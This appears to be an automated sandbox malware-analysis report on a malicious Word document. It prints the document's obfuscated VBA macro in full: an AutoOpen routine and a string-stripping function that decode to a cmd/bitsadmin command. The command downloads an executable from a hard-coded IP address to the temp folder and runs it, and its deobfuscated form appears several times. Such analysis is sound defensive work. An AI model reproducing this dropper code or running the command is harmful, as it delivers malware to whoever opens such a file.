Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MSOSQM.EXE PID: 304 Parent PID: 3696

General

Start time:	17:36:26
Start date:	12/01/2017
Path:	C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE
Imagebase:	0x1240000
File size:	550576 bytes
MD5 hash:	04D5CDDFC37410CF388AD731E655E277
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: NewMacros

Declaration

Line	Content
1	Attribute VB_Name = "NewMacros"

Executed Functions

Subroutine AutoOpen, APIs: 27, Strings: 9, Number of lines: 46, Relevance: 78.046

APIs	Meta Information
Array
Array
Array
Array
Array
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Replace
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: CreateObject
Part of subcall function MJCTM@NewMacros: Date
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Pattern
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Date
Part of subcall function MJCTM@NewMacros: Array
Part of subcall function MJCTM@NewMacros: Global
Part of subcall function MJCTM@NewMacros: Replace
Array
Date
Shell	Shell("cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit",0) -> 1964
Array
Array

Strings	Decrypted Strings
"08fd"
"T"
"debasement"
"So4T9"
"cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9"
"ring"
"317eed7b"
"32500"
""""

Line	Instruction	Meta Information
89	Sub AutoOpen()
90	Dim GUEQgl0 as Currency	executed
91	GUEQgl0 = - 4067
92	Dim wcUbOm
93	wcUbOm = Array()	Array
94	Dim gq5z4s
95	gq5z4s = Array(44415.093361908, - 12425, True, "T", "08fd", True)	Array
96	oUJ1RH = 12730.522629119
97	Dim SYLDEIEHU as Long
98	SYLDEIEHU = - 1851000800
99	Dim FtubqlSwF
100	FtubqlSwF = 194
101	Const nfYJAbOe = True
102	dXqA7m = Array(- 12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019)	Array
103	Dim nUKaI61f as String
104	Const EbPbjMfg = False
105	Dim ETBwFjm
106	ETBwFjm = Array()	Array
107	qHfrpSwZq = - 219635906
108	Dim uj0Cswp
109	uj0Cswp = 9
110	Dim kyyXvysya as Variant
111	kyyXvysya = Array()	Array
112	nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9")
113	AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, - 2378)	Array
114	Dim jQsbW
115	jQsbW = Date	Date
116	Dim J8pAjy as String
117	J8pAjy = "317eed7b"
118	zHgWO = - 2086329278
119	kpmVq = Empty
120	BqXpmPanR = True
121	hRpGYfaRr = - 426398108
122	Const IbHFT = "32500"
123	G3h5PwT = - 13855
124	Shell nUKaI61f, 0	Shell("cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit",0) -> 1964 executed
125	Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, - 1868748710, "")	Array
126	ORSXIMyL = - 16892
127	Dim SGqXR
128	SGqXR = 16032.845284238
129	Const OFXiY = 34986.350534212
130	Dim xQWF3VrvY as Variant
131	xQWF3VrvY = Array()	Array
132	dVrztZa = 0
133	JBwM8 = 14580.854766339
134	End Sub

Function MJCTM, APIs: 17, Strings: 11, Number of lines: 86, Relevance: 72.086

APIs	Meta Information
Array
Replace	Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","So4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit
Array
Array
Array
CreateObject	CreateObject("vbscript.regexp")
Date
Array
Array
Array
Pattern
Array
Array
Date
Array
Global
Replace	IRegExp2.Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit

Strings	Decrypted Strings
"usher"
"l"
""""
"m"
"vbscript.regexp"
"b1bc"
"g"
""""
"-51274"
"-31815"
""""

Line	Instruction	Meta Information
2	Function MJCTM(CWDMxZLy as String, FbIlx as String)
3	Const MiPNInTB = "usher"	executed
4	Const VoTwTzi = 56413.774156729
5	ijrJGJ = 27499.72631798
6	Dim SMBLRBfVb
7	SMBLRBfVb = Empty
8	Dim UaeOs
9	UaeOs = Array()	Array
10	Dim u6TmeUD
11	u6TmeUD = 104
12	ur6AH = Null
13	cxnTF = "l"
14	MJCTM = Replace(CWDMxZLy, FbIlx, "")	Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","So4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit executed
15	Dim pLTyDvz
16	pLTyDvz = Empty
17	pcIlatmCk = Array(230, - 196, - 2001184018, 42, True)	Array
18	BnrkBExe = Array(10023, True, 53568, 247)	Array
19	Dim WDYsMRc
20	WDYsMRc = 30721.11938915
21	Dim YzdUxwdTr as Integer
22	YzdUxwdTr = 6299
23	Dim lByiA
24	lByiA = Array()	Array
25	Const zLddbe = "m"
26	Dim rIBoSu3Y
27	rIBoSu3Y = Null
28	Set SHswlL = CreateObject("vbscript.regexp")	CreateObject("vbscript.regexp") executed
29	QSdqj = Date	Date
30	Const NFLd2 = 209
31	Dim twrPREK as Variant
32	twrPREK = Array()	Array
33	Dim u5gdI as Variant
34	u5gdI = Array(False, "b1bc", 253, 17635, - 1034035452)	Array
35	Const AiUVN = 130
36	Dim xrO5u as Boolean
37	xrO5u = False
38	Dim DtSd2 as Currency
39	DtSd2 = 24643
40	TxB7XFd = Array()	Array
41	SHswlL.Pattern = FbIlx	Pattern
42	Dim KWqu4PuM
43	KWqu4PuM = Array(18941)	Array
44	Const PoTWMJbw = 4611
45	Const zvcqMHRt = 45690
46	Dim dBM7m
47	dBM7m = Array()	Array
48	Dim Jhkf0ces
49	Jhkf0ces = 18334
50	Px3LN = Empty
51	Dim CP3XeR as Long
52	Dim QLnSIFu
53	QLnSIFu = "g"
54	Dim FjRfK
55	FjRfK = 37054
56	Dim lttYOFV as Byte
57	lttYOFV = 103
58	Dim hwbE4nQC
59	hwbE4nQC = 238
60	Dim HxZaHEuKH
61	HxZaHEuKH = ""
62	ZIGd3quHC = Date	Date
63	efuU1j3i = 19822
64	CP3XeR = True
65	IsvteRd = True
66	Dim xrm3j
67	xrm3j = 0
68	Const wwBlWqvE = 32055
69	Dim YrDaO as Integer
70	YrDaO = - 20549
71	Dim TQAPu
72	TQAPu = Empty
73	XFRbqp6x = False
74	QvKu9pdc = Array(0, - 324123460, True, "-51274", 201, 77, 0)	Array
75	Const ZLaDNPOM0 = 0
76	SHswlL.Global = CP3XeR	Global
77	Dim BShA9 as Long
78	BShA9 = - 652703950
79	Dim VLlsY
80	VLlsY = 173
81	Dim JrF8V
82	JrF8V = Null
83	Const YCxJyqzq = - 23691
84	PlVOxYFG = "-31815"
85	Const QjPYL = 224
86	MJCTM = SHswlL.Replace(CWDMxZLy, "")	IRegExp2.Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit executed
87	End Function

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Persistence and Installation Behavior:

Data Obfuscation:

System Summary:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static OLE Info

General

OLE File "2e374756930bee59c371d98ff88572a8.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: NewMacros.bas, Stream Size: 8792

General

VBA Code with Deobfuscations

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 924

General

VBA Code with Deobfuscations

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 113

General

Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096

General

Stream Path: 1Table, File Type: FoxPro FPT, blocks size 256, next free block index 2248282368, Stream Size: 7198

General

Stream Path: Data, File Type: data, Stream Size: 74220

General

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 485

General

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71

General

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4210

General

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 588

General

Stream Path: WordDocument, File Type: data, Stream Size: 8248

General

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: WINWORD.EXE PID: 3696 Parent PID: 2740